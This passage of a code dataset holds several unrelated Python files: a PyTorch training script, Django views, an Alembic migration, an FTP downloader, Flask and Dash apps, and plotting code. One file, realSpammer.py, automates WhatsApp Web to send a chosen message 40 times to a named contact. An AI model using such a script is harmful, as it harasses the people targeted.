axis=0)\n\n\n train_dataset = MoADataset(train_X_, train_Y_)\n train_data_loader = torch.utils.data.DataLoader(train_dataset\n , batch_size=128\n , shuffle=True)\n\n model = Model(len(features), len(targets), 1500)\n model.to(device)\n\n optimizer = torch.optim.Adam(model.parameters(), betas=(0.9, 0.99)\n , lr=1e-3\n , weight_decay=weight_decay\n , eps=1e-5)\n scheduler = torch.optim.lr_scheduler.OneCycleLR(optimizer=optimizer\n , pct_start=0.1\n , div_factor=1e3\n , max_lr=lr, epochs=EPOCHS\n , steps_per_epoch=len(train_data_loader))\n\n loss_fn = nn.BCEWithLogitsLoss()\n loss_tr = SmoothBCEwLogits(smoothing = 0.001)\n\n best_valid_metric = 1e9\n not_improve_epochs = 0\n for epoch in range(EPOCHS):\n # train\n train_loss = 0.0\n train_num = 0\n for data in (train_data_loader):\n optimizer.zero_grad()\n x, y = data['x'].to(device), data['y'].to(device)\n outputs = model(x)\n loss = loss_tr(outputs, y)\n loss.backward()\n optimizer.step()\n scheduler.step()\n train_num += x.shape[0]\n train_loss += (loss.item()*x.shape[0])\n\n train_loss /= train_num\n # eval\n model.eval()\n valid_loss = 0.0\n valid_num = 0\n for data in (valid_data_loader):\n x, y = data['x'].to(device), data['y'].to(device)\n outputs = model(x)\n loss = loss_fn(outputs, y)\n valid_num += x.shape[0]\n valid_loss += (loss.item()*x.shape[0])\n valid_loss /= valid_num\n t_preds = []\n for data in (test_data_loader):\n x = data[0].to(device)\n with torch.no_grad():\n outputs = model(x)\n t_preds.extend(list(outputs.sigmoid().cpu().detach().numpy()))\n pred_mean = np.mean(t_preds)\n if valid_loss < best_valid_metric:\n fname = os.path.join(args.model_dir\n , 'model_dnn_final_fold%s'%fold+'_'+str(seed)+'.ckpt')\n torch.save(model.state_dict(), fname)\n not_improve_epochs = 0\n best_valid_metric = valid_loss\n logging.info('[epoch %s] lr: %.6f, train_loss: %.6f, valid_metric: %.6f, pred_mean:%.6f'%(epoch, optimizer.param_groups[0]['lr'], train_loss, valid_loss, pred_mean))\n trn_loss_.append(train_loss)\n else:\n not_improve_epochs += 1\n logging.info('[epoch %s] lr: %.6f, train_loss: %.6f, valid_metric: %.6f, pred_mean:%.6f, NIE +1 ---> %s'%(epoch, optimizer.param_groups[0]['lr'], train_loss, valid_loss, pred_mean, not_improve_epochs))\n if not_improve_epochs >= 30 and epoch>15:\n break\n model.train()\n if epoch!=28:\n aug_X, aug_Y = Ctl_augment(ori_train.loc[trn_ind]\n , train_target.loc[trn_ind], include_test=1)\n train_X_ = np.concatenate([train_X, aug_X], axis=0)\n train_Y_ = np.concatenate([train_Y, aug_Y], axis=0)\n train_dataset = MoADataset(train_X_, train_Y_)\n train_data_loader = torch.utils.data.DataLoader(train_dataset\n , batch_size=128, shuffle=True)\n\n # Load best model for evaluation \n state_dict = torch.load(fname\n , torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") )\n model.load_state_dict(state_dict)\n model.eval()\n\n valid_preds = []\n for data in (valid_data_loader):\n x, y = data['x'].to(device), data['y'].to(device)\n with torch.no_grad():\n outputs = model(x)\n valid_preds.extend(list(outputs.cpu().detach().numpy()))\n oof.loc[val_ind, targets] = 1 / (1+np.exp(-np.array(valid_preds)))\n t_preds = []\n for data in (test_data_loader):\n x = data[0].to(device)\n with torch.no_grad():\n outputs = model(x)\n t_preds.extend(list(outputs.sigmoid().cpu().detach().numpy()))\n logging.info(np.mean(t_preds))\n preds.append(t_preds)\n train_preds=[]\n\n for data in (eval_train_data_loader):\n x = data['x'].to(device)\n with torch.no_grad():\n outputs = model(x)\n train_preds.extend(list(outputs.sigmoid().cpu().detach().numpy()))\n train_loss = Metric(eval_train_Y, train_preds)\n eval_train_loss += train_loss\n logging.info('eval_train_loss:', train_loss)\n\n sub[targets] = np.array(preds).mean(axis=0)\n return oof, sub\n\ndef Seed_everything(seed=42):\n random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n\ndef Metric(labels, preds):\n labels = np.array(labels)\n preds = np.array(preds)\n metric = 0\n for i in range(labels.shape[1]):\n metric += (-np.mean(labels[:, i]*np.log(np.maximum(preds[:, i], 1e-15))+(1-labels[:, i])*np.log(np.maximum(1-preds[:, i], 1e-15))))\n return metric/labels.shape[1]\n\nargs = argparse.ArgumentParser()\nargs.add_argument('--input_dir', default='./data/from_kaggle', help='input data path of dataset')\nargs.add_argument('--model_dir', default='./experiments/base_model', help='model path to params.json')\n\n## MAIN -------------------------------------------------------\n\nSeed_everything(seed=42)\n\nargs = args.parse_args()\n\n# load parameters \njson_path = os.path.join(args.model_dir, 'params.json') \nassert os.path.isfile(json_path), \"No json file found at {}\".format(json_path)\nparams = utils.Params(json_path)\n\n# set log info\nutils.set_logger(os.path.join(args.model_dir, 'shiji_submission1.log'))\n\n# Set parameters \ndevice = ('cuda' if torch.cuda.is_available() else 'cpu')\nncompo_genes = params.ncompo_genes #80\nncompo_cells = params.ncompo_cells #10\n\nEPOCHS = params.num_epochs # 29 \nSEEDS = params.num_seeds # 3\nLEARNING = 1/90.0/3.5*7\nDECAY = 1e-5/9.5\nFOLDS = 5\nAUGMENT = params.augmentation\n\n\ntrn_loss_ = []\n \nfiles = ['%s/test_features.csv'%args.input_dir, \n '%s/train_targets_scored.csv'%args.input_dir, \n '%s/train_features.csv'%args.input_dir, \n '%s/train_targets_nonscored.csv'%args.input_dir, \n '%s/train_drug.csv'%args.input_dir, \n '%s/sample_submission.csv'%args.input_dir]\n\ntest = pd.read_csv(files[0])\ntrain_target = pd.read_csv(files[1])\ntrain = pd.read_csv(files[2])\ntrain_nonscored = pd.read_csv(files[3])\ntrain_drug = pd.read_csv(files[4])\nsub = pd.read_csv(files[5])\n\ngenes = [col for col in train.columns if col.startswith(\"g-\")]\ncells = [col for col in train.columns if col.startswith(\"c-\")]\n\nfeatures = genes + cells\ntargets = [col for col in train_target if col!='sig_id']\ntargets_ns=[col for col in train_nonscored if col!='sig_id']\n\ntrain_target = pd.merge(train_target, train_nonscored, on='sig_id')\n\nori_train = train.copy()\nctl_train = train.loc[train['cp_type']=='ctl_vehicle'].append(test.loc[test['cp_type']=='ctl_vehicle']).reset_index(drop=True)\nctl_train2 = train.loc[train['cp_type']=='ctl_vehicle'].reset_index(drop=True)\n\nori_test = test.copy()\nctl_test = test.loc[test['cp_type']=='ctl_vehicle'].reset_index(drop=True)\n\ntt = train.append(test).reset_index(drop=True)\ntt, transformers, gene_pca, cell_pca = Feature(tt)\ntrain = tt[:train.shape[0]]\ntest = tt[train.shape[0]:].reset_index(drop=True)\n\nif 1:\n train_target = train_target.loc[train['cp_type']!='ctl_vehicle'].reset_index(drop=True)\n train_nonscored = train_nonscored.loc[train['cp_type']!='ctl_vehicle'].reset_index(drop=True)\n train_drug = train_drug.loc[train['cp_type']!='ctl_vehicle'].reset_index(drop=True)\n ori_train = ori_train.loc[train['cp_type']!='ctl_vehicle'].reset_index(drop=True)\n train = train.loc[train['cp_type']!='ctl_vehicle'].reset_index(drop=True)\n\ntrain_cols = [col for col in train.columns if col not in ['sig_id', 'cp_type']]\n\nSeed_everything(0)\noof, sub = train_and_predict(features = train_cols\n , sub = sub.copy()\n , aug = AUGMENT\n , folds = FOLDS\n , seed = 0\n , lr = LEARNING\n , weight_decay = DECAY)\n\noutputs = []\nfor seed in range(SEEDS):\n Seed_everything(seed)\n outputs.append(train_and_predict(features = train_cols\n , sub = sub.copy()\n , aug = AUGMENT\n , folds = FOLDS\n , seed = seed\n , lr = LEARNING\n , weight_decay = DECAY))\n\n# correlation coefficient oof vs. output\nfor output in outputs:\n logging.info('oof corr:', np.corrcoef(oof[targets].values.reshape(-1)\n , output[0][targets].values.reshape(-1))[0][1])\n logging.info('sub corr:', np.corrcoef(sub[targets].values.reshape(-1)\n , output[1][targets].values.reshape(-1))[0][1])\n\n# Average over seeds\nfor output in outputs:\n oof[targets] += output[0][targets]\n sub[targets] += output[1][targets]\noof[targets] /= (1+len(outputs))\nsub[targets] /= (1+len(outputs))\n\n# Valid logloss\nvalid_metric = Metric(train_target[targets].values, oof[targets].values)\nlogging.info('oof mean:%.6f, sub mean:%.6f, valid metric:%.6f'%(oof[targets].mean().mean(), sub[targets].mean().mean(), valid_metric))\n\n# Save output \nsub.loc[test['cp_type']=='ctl_vehicle', targets] = 0.0\nsub.to_csv(os.path.join(args.model_dir, 'shiji_submission1.csv'), index = False)\noof.to_csv(os.path.join(args.model_dir, 'shiji_submission1_oof.csv'), index = False)\n\n","sub_path":"shiji_solution1.py","file_name":"shiji_solution1.py","file_ext":"py","file_size_in_byte":17535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"296888386","text":"from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.shortcuts import get_object_or_404, render, redirect\nfrom django.views.generic import CreateView, UpdateView, DeleteView\n\nfrom .models import Movie, MovieCrew, MovieComment, MovieRate\nfrom .forms import MovieCommentForm, MovieRateForm\n\n\ndef movies_list(request):\n movie_list = Movie.objects.all().order_by('-release_date')[:10]\n context = {\n 'm_list': movie_list,\n\n }\n return render(request, 'movies/home.html', context)\n\n\ndef movies_detail(request, movie_id, comment_form=None, rate_form=None):\n movie = get_object_or_404(Movie, pk=movie_id)\n if comment_form is None:\n comment_form = MovieCommentForm()\n if rate_form is None:\n rate_form = MovieRateForm()\n context = {\n 'movie': movie,\n 'mc_list': MovieCrew.objects.select_related('crew', 'role').filter(movie=movie),\n 'dir': MovieCrew.objects.select_related('crew', 'role').filter(movie=movie),\n\n 'comment_list': MovieComment.objects.select_related('user').filter(\n movie=movie,\n status=MovieComment.APPROVED\n ).order_by('-created_time'),\n 'rate_form': rate_form,\n 'comment_form': comment_form,\n }\n return render(request, 'movies/detail.Html', context)\n\n\n@login_required()\ndef movies_comment(request, movie_id):\n movie = get_object_or_404(Movie, pk=movie_id)\n mcf = MovieCommentForm(request.POST)\n if not mcf.is_valid():\n return movies_detail(request, movie_id, comment_form=mcf)\n obj = MovieComment()\n obj.movie = movie\n obj.user = request.user\n obj.comment_text = mcf.cleaned_data.get('comment_text')\n obj.save()\n\n return redirect('movie-detail', movie_id=movie_id)\n\n\n@login_required()\ndef movies_rating(request, movie_id):\n movie = get_object_or_404(Movie, pk=movie_id)\n mrf = MovieRateForm(request.POST)\n if not mrf.is_valid():\n return movies_detail(request, movie_id, rate_form=mrf)\n obj = MovieRate()\n obj.movie = movie\n obj.user = request.user\n obj.point = mrf.cleaned_data.get('rate')\n obj.save()\n return redirect('movie-detail', movie_id=movie_id)\n\n\nclass MovieCreateView(LoginRequiredMixin, CreateView):\n model = Movie\n fields = ['title', 'release_date', 'genre', 'picture']\n\n def form_valid(self, form):\n form.instance.user = self.request.user\n return super().form_valid(form)\n\nclass MovieUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):\n model = Movie\n fields = ['title', 'release_date', 'genre', 'picture']\n success_url = '/movies/'\n\n def form_valid(self, form):\n form.instance.user = self.request.user\n return super().form_valid(form)\n\n def test_func(self):\n movie = self.get_object()\n if self.request.user == movie.user:\n return True\n return False\n\n\nclass MovieDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):\n model = Movie\n success_url = '/movies/'\n\n def test_func(self):\n movie = self.get_object()\n if self.request.user == movie.user:\n return True\n return False\n","sub_path":"movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"419380610","text":"\"\"\"empty message\n\nRevision ID: 45f751bd46a8\nRevises: 7c96393a9a7c\nCreate Date: 2018-06-01 08:20:21.706536\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '45f751bd46a8'\ndown_revision = '7c96393a9a7c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint('aliment_group_unique', 'aliment_group', ['aliment_id', 'group_id'])\n op.drop_constraint('aliment_group_', 'aliment_group', type_='unique')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint('aliment_group_', 'aliment_group', ['aliment_id', 'group_id'])\n op.drop_constraint('aliment_group_unique', 'aliment_group', type_='unique')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/45f751bd46a8_.py","file_name":"45f751bd46a8_.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"270730583","text":"from selenium import webdriver\n\ndriver = webdriver.Chrome('C:\\\\chromedriver.exe')\ndriver.get(\"https://web.whatsapp.com\")\ndriver.implicitly_wait(15)\ndriver.find_element_by_css_selector(\"span[title='\" + input(\"Enter name to spam: \") + \"']\").click()\ninputString = input(\"Enter message to send: \")\ncount = 40\nwhile(count>0):\n count-=1\n driver.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]').send_keys(inputString)\n driver.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[3]/button').click()\n\n\n","sub_path":"realSpammer.py","file_name":"realSpammer.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"574748551","text":"hour_counts = dict()\nhour_list = list()\nwhile True:\n file_name = input('Enter a file name:')\n try:\n file_handle = open(file_name)\n break\n except:\n print('No such file')\nfor line in file_handle:\n if line.startswith('From '):\n line = line.strip()\n words = line.split()\n words = words[5].split(':')\n hour_counts[words[0]] = hour_counts.get(words[0], 0) + 1\nhour_list = list(hour_counts.items())\nhour_list.sort()\nfor hour, count in hour_list:\n print(hour, count)\n","sub_path":"ex_10_02.py","file_name":"ex_10_02.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"570681080","text":"# Short script to utilize the murlin trebuchet class to create the time interval graphic.\n\n# Written by Graham Bell 6th December 2016.\n\nimport numpy as np\nfrom optimizeAllTrebs import simpleMurlinDict\nimport matplotlib.pyplot as plt\nimport latexPlotTools as lpt\n\n# Perform the throw at m1 = 50\ntrebDict = simpleMurlinDict\n# Create instance of the trebuchet.\ntreb = trebDict['TrebClass']()\n\nzinit = trebDict['zinit']\n\nm1 = 50.0\na = 1.22\nL2 = 4.0\nL3 = 4.0\nrange, throwAngle = treb.runTreb(L2=L2, L3=L3, a=a, m1=m1, endtime=2.0, zinit=zinit, theta0=np.pi/4)\n# Throw step index\nmaxThrowIndex = treb.maxThrowIndex\nprint('range', range, 'throw Angle', throwAngle, 'maxThrowIndex', maxThrowIndex)\nfig = plt.figure(figsize=(10, 6), dpi=80)\nplt.subplot(1, 1, 1, aspect='equal')\n\nbounds = 6\nxlimits = plt.xlim(-bounds, bounds)\nylimits = plt.ylim(-bounds, bounds)\nax = plt.axes(xlim=xlimits, ylim=ylimits, aspect='equal')\n\nfig, ax = lpt.newfig(0.8) #plt.subplots()\nframeInterval = 5\nfor frame in np.arange(0, maxThrowIndex, step=frameInterval):\n ax = treb.plotTreb(ax, i=int(frame), projRadius=0.2, CWRadius=0.2, lineThickness=1.0, beamCentreRadius=0.1,\n imageAlpha=0.2)\n# Plot the throw freeze point\nax = treb.plotTreb(ax, i=maxThrowIndex, projRadius=0.2, CWRadius=0.2, lineThickness=1.0, beamCentreRadius=0.1)\n\nax.set_xlim(-10, 6)\nax.set_ylim(-8, 8)\nax.set_aspect('equal')\nax.set_xlabel(r'$x$(m)')\nax.set_ylabel(r'$y$(m)')\nplotName = 'murlinTimeInterval'\nplt.tight_layout()\nlpt.savefig(plotName)\n#fig.savefig('./murlinTimeInterval.png', dpi=500)\n","sub_path":"murlinTimeIntevalGraphic.py","file_name":"murlinTimeIntevalGraphic.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"439632229","text":"# Third Party\nimport torch.nn as nn\n\n\n############\n# COMPONENTS\n############\n\n\nclass Encoder(nn.Module):\n def __init__(self, input_dim, hidden_dim):\n super(Encoder, self).__init__()\n\n self.linear1 = nn.Linear(input_dim, 20)\n self.linear2 = nn.Linear(20, hidden_dim)\n\n self.hidden_activ = nn.Sigmoid()\n self.output_activ = nn.Tanh()\n\n def forward(self, x):\n x = self.hidden_activ(self.linear1(x))\n x = self.output_activ(self.linear2(x))\n\n return x\n\n\nclass Decoder(nn.Module):\n def __init__(self, hidden_dim, input_dim):\n super(Decoder, self).__init__()\n\n self.linear1 = nn.Linear(hidden_dim, 20)\n self.linear2 = nn.Linear(20, input_dim)\n\n self.hidden_activ = nn.Sigmoid()\n\n def forward(self, x):\n x = self.hidden_activ(self.linear1(x))\n x = self.linear2(x)\n\n return x\n\n\n#########\n# EXPORTS\n#########\n\n\nclass SAE(nn.Module):\n def __init__(self, input_dim, hidden_dim):\n super(SAE, self).__init__()\n\n self.encoder = Encoder(input_dim, hidden_dim)\n self.decoder = Decoder(hidden_dim, input_dim)\n\n def forward(self, x):\n x = self.encoder(x)\n x = self.decoder(x)\n\n return x\n","sub_path":"sequitur/autoencoders/sae.py","file_name":"sae.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"576275871","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2020/4/1 16:55\n# @Author : evaseemefly\n# @Desc : ftp工具类,用来根据传入的 file 类型,获取匹配的 file names\n# @Site : \n# @File : ftp.py\n# @Software: PyCharm\nimport os\nfrom ftplib import FTP, FTP_TLS\nfrom ftplib import error_perm\nimport socket\nfrom fnmatch import fnmatch, fnmatchcase\n\nfrom typing import List\n\n# 当前项目\nfrom core.file import ICoverageFile, IFileBase\nfrom core.db import DbFile\nfrom util.tools import check_path_exist, exe_run_time\nfrom conf.settings import _MYSQL\n\n# 日志\nfrom common.exceptionLog import exception\nfrom common.log import logger\n\n\nclass FtpFactory:\n def __init__(self, host, user, pwd, port=21):\n self.host = host\n self.user = user\n self.pwd = pwd\n self.port = port\n self.ftp: FTP = None\n\n def init_ftp(self):\n '''\n 初始化ftp\n :return:\n '''\n if self.ftp is None:\n self.ftp = FTP()\n if all([self.host, self.user, self.pwd]):\n # 参考\n try:\n self.ftp.set_debuglevel(0)\n self.ftp.connect(self.host, self.port)\n self.ftp.login(self.user, self.pwd)\n print(self.ftp.getwelcome())\n # msg=self.ftp.retrlines('LIST xb*')\n except(socket.error, socket.gaierror):\n print(f\"连接错误:{self.host, self.port}\")\n self.ftp = None\n except error_perm:\n # 认证错误\n print(\"认证错误,请检查用户名及密码\")\n self.ftp = None\n except Exception as e:\n print(f\"其他未知错误{e}\")\n self.ftp = None\n\n def get_all_list(self) -> List[str]:\n '''\n 获取当前路径下的全部文件\n :return:\n '''\n return self.ftp.nlst()\n\n def _get_match_list(self, file: IFileBase) -> List[str]:\n list_all_names = self.get_all_list()\n list_match_names = [name for name in list_all_names if fnmatch(name, file.get_re)]\n return list_match_names\n\n def _download_file(self, file_name: str, local_path: str):\n '''\n 将ftp目录下的指定文件下载至本地的指定目录下\n :param remote_path:\n :param local_path:\n :return:\n '''\n cache_size = 1024\n\n # 将此方法统一放在common.tools中\n check_path_exist(local_path)\n print(f\"开始下载{file_name}....\")\n fp = open(os.path.join(local_path, file_name), 'wb')\n # 读取指定文件并写入本地文件\n # 错误1:ftplib.error_perm: 500 Syntax error, command unrecognized.\n msg = self.ftp.retrbinary('RETR ' + file_name, fp.write, cache_size)\n # 判断ftp返回的状态\n if msg.find('226') != -1:\n print(f\"{file_name}下载完毕,存储至:{os.path.join(local_path, file_name)}\")\n self.ftp.set_debuglevel(0)\n fp.close()\n\n # @exe_run_time()\n @exception(logger)\n def batch_download(self, file: IFileBase):\n '''\n 批量下载\n 由于定时任务执行时是找到日期去下载当日的全部 栅格 数据,所以只需根据传入的 栅格 file 实现类获取其中的关键信息即可\n @param file:\n @return:\n '''\n if self.ftp is None:\n self.init_ftp()\n if isinstance(file, IFileBase):\n # if file in isinstance(IFileBase):\n # 1 获取正则匹配的 files names\n list_match: List[str] = self._get_match_list(file)\n for file_temp_name in list_match:\n self.download(file_temp_name, file.save_path)\n\n # @exe_run_time()\n def download(self, file_name: str, target_dir: str):\n '''\n 下载单一的文件\n @param file_name: 文件名称\n @param target_dir:下载到的路径\n @return:\n '''\n # 2 执行下载操作,并进行分类存储\n self._download_file(file_name, target_dir)\n # 3 TODO:[*] 20-04-04 下载结束后写入数据库+日志记录 (by cwb)\n db_file = DbFile(_MYSQL.get('HOST'), _MYSQL.get('DB_NAME'), _MYSQL.get('USER'), _MYSQL.get('PASSWORD'))\n db_file.record_state(file_name, target_dir)\n # 4 需要执行标准化操作(by yyq)\n # 5 TODO:[*] 20-04-04 将标准化后的文件信息 写入数据库+日志记录 (by cwb)\n","sub_path":"background/06byDelayTask/proj/core/ftp.py","file_name":"ftp.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"420951739","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri May 29 15:34:21 2021\r\n\r\n@author: Dhaval Panchal\r\n\"\"\"\r\n\r\nimport dash\r\nimport dash_html_components as html\r\nimport dash_core_components as dcc\r\nfrom dash.dependencies import Output, Input, State\r\nimport plotly.express as px \r\nimport plotly.graph_objects as go\r\nimport pandas as pd\r\n\r\ndf = pd.read_csv(r\"C:\\Users\\dhaval.panchal\\Pictures\\cars_categorization\\Training_CSV_File/Training_Data.csv\",encoding= 'unicode_escape')\r\n\r\ndf.columns = [column.replace(\" \", \"_\") for column in df.columns]\r\n\r\ndf.query(\"climate_control == True\", inplace = True)\r\nclimate_control = df[\"car_model\"]\r\n\r\ndf.query(\"roof == True\", inplace = True)\r\nsunroof = df[\"car_model\"]\r\n\r\ndf.query(\"petrol == True\", inplace = True)\r\npetrol = df[\"car_model\"]\r\n\r\ndf.query(\"cng == True\", inplace = True)\r\ncng = df[\"car_model\"]\r\n\r\ndf.query(\"diesel == True\", inplace = True)\r\ndiesel = df[\"car_model\"]\r\n\r\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\napp.layout = html.Div([\r\n dcc.Dropdown(\r\n id='demo-dropdown',\r\n options=[\r\n {'label': 'petrol', 'value': '{}'.format(petrol)},\r\n {'label': 'cng', 'value': '{}'.format(cng)},\r\n {'label': 'diesel', 'value': '{}'.format(diesel)},\r\n {'label': 'sunroof', 'value': '{}'.format(sunroof)},\r\n {'label': 'climate_control', 'value': '{}'.format(climate_control)}\r\n ],\r\n value='{}'.format(petrol)\r\n ),\r\n html.Div(id='dd-output-container')\r\n])\r\n\r\n@app.callback(\r\n dash.dependencies.Output('dd-output-container', 'children'),\r\n [dash.dependencies.Input('demo-dropdown', 'value')])\r\ndef update_output(value):\r\n return 'You have selected \"{}\"'.format(value)\r\n\r\nif __name__ == '__main__':\r\n app.run_server(host='172.28.11.251',port='49766',debug=True, use_reloader=False) \r\n","sub_path":"Dashaboard_Code.py","file_name":"Dashaboard_Code.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"135469664","text":"import pdb\nfrom collections import defaultdict\n# given a sorted array, can you extract unique elements from the array?\n\n# amortized O(n) complexity\ndef unique(a):\n r = [a[0]]\n for n in a:\n if n != r[-1]:\n r.append(n) # amortized O(1) operation\n return r\n\n# using hash table\ndef unique2(a):\n d = defaultdict(int)\n for i in a:\n d[i] += 1\n return d.keys()\n\nif __name__=='__main__':\n print(unique([1,1,3,3,3,5,5,5,9,9,9,9]))\n print(unique2([1,1,3,3,3,5,5,5,9,9,9,9]))\n \n\n","sub_path":"unique.py","file_name":"unique.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"320336536","text":"from components.winch import Winch\nfrom magicbot import StateMachine, state, timed_state\nfrom networktables import NetworkTable\n \n\nclass WinchAutomation(StateMachine):\n winch = Winch\n sd = NetworkTable\n\n @state(first=True)\n def retract_piston(self):\n self.sd.putString(\"state\", \"climbing\")\n self.winch.rope_lock_solenoid_reverse()\n self.next_state(\"on_motor\")\n\n @timed_state(duration=2, must_finish=True, next_state=\"rotate_winch\")\n def on_motor(self):\n self.winch.rotate_winch(0.3)\n\n @state(must_finish=True)\n def rotate_winch(self):\n if self.winch.on_rope_engaged():\n self.next_state(\"fire_piston\")\n\n @state(must_finish=True)\n def fire_piston(self):\n self.winch.rope_lock_solenoid_forward()\n self.winch.rotate_winch(0.8)\n self.next_state(\"on_motor_full\")\n\n @timed_state(duration=2, must_finish=True, next_state=\"touchpad_pressed\")\n def on_motor_full(self):\n pass\n\n @state(must_finish=True)\n def touchpad_pressed(self):\n if self.winch.on_touchpad_engaged():\n self.next_state(\"stop_motor\")\n\n @state(must_finish=True)\n def stop_motor(self):\n self.winch.rotate_winch(0)\n self.sd.putString(\"state\", \"stationary\")\n self.done()\n","sub_path":"automations/winchautomation.py","file_name":"winchautomation.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"580900633","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom server import server_config\n\nsettings = server_config.get_settings()\n\nengine = create_engine(\n settings.database_url, connect_args={\"check_same_thread\": False}\n)\nSessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)\nBase = declarative_base()\n\n\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n","sub_path":"database/db_config.py","file_name":"db_config.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"284019861","text":"'''\nAuthor: Paul\nCreated on: Nov 29, 2013\n\n'''\n\nimport time\nimport cProfile\n\ndef main():\n maximum=0\n maxval=0\n for i in range(1,100000,2):\n rec=recurringPartLength(i)\n print(i,rec)\n if(rec>maximum):\n maximum=rec\n maxval=i\n print(maxval,max)\n \n \n \n \n \n\n\ndef recurringPartLength(number):\n if(number%2==0 or number%5==0):\n return 0\n else:\n i=1\n while(1):\n if(int('9'*i)%number==0):\n break\n i+=1\n return i\n\n\nstart=float(time.time())\ncProfile.run('main()')\nprint(time.time()-start)","sub_path":"Problems/Problem26.py","file_name":"Problem26.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"395870091","text":"#!/usr/bin/env python3\n# encoding: utf-8\n\n'''\nDefine a logging object which will be quoted by other files\nCreated on Sep 01, 2021\n@author: Guangli.bao\n'''\nimport logging\n\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filename='auto_orthogonal_array.log',\n filemode='w')\nlogger = logging.getLogger('')\nconsole = logging.StreamHandler()\nconsole.setLevel(logging.INFO)\nformatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\nconsole.setFormatter(formatter)\n","sub_path":"auto_testcase_generator/auto_orthogonal_arrays_testcase_generator/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"105455594","text":"#!/usr/bin/python\n# encoding: utf-8\n\n# @file: __init__.py.py\n# @time: 2018/4/2 0:49\n# @author: FunnyWu\n# @contact: agiot1026@163.com\n# @Software: PyCharm\nimport os\nimport logging\nimport logging.handlers\n\nfrom flask import Flask\nfrom flask_login import LoginManager\n\nfrom .models import db, User\n\nlogin_manager = LoginManager()\n\n\ndef create_app():\n app = Flask(__name__)\n app.config.from_object('app.secure')\n app.config.from_object('app.setting')\n\n login_manager.init_app(app)\n login_manager.login_view = 'web.login'\n login_manager.login_message = '请先登录或注册'\n\n # 注册日志配置\n add_logger(app)\n\n # 初始化蓝图\n register_buleprint(app)\n # register_api(app)\n\n # 绑定数据库\n db.init_app(app)\n\n # 下面两种方法都可以创建数据库\n # with app.app_context():\n # db.create_all()\n db.create_all(app=app)\n\n return app\n\n\ndef add_logger(app):\n app.logger.setLevel(logging.INFO)\n info_log = os.path.join(app.root_path, '../', './logs', 'app-info.log')\n\n info_file_handler = logging.handlers.RotatingFileHandler(\n info_log, maxBytes=1048576, backupCount=20)\n info_file_handler.setLevel(logging.INFO)\n info_file_handler.setFormatter(\n logging.Formatter('%(asctime)s %(levelname)s: %(message)s '\n '[in %(pathname)s:%(lineno)d]')\n )\n app.logger.addHandler(info_file_handler)\n\n\n@login_manager.user_loader\ndef get_user(uid):\n return User.query.get((int(uid)))\n\n\ndef register_api(app):\n from .api import api\n api.init_app(app)\n\n\ndef register_buleprint(app):\n from .web import web\n from .api import api\n app.register_blueprint(web)\n app.register_blueprint(api)\n","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"130606087","text":"\nMAX = 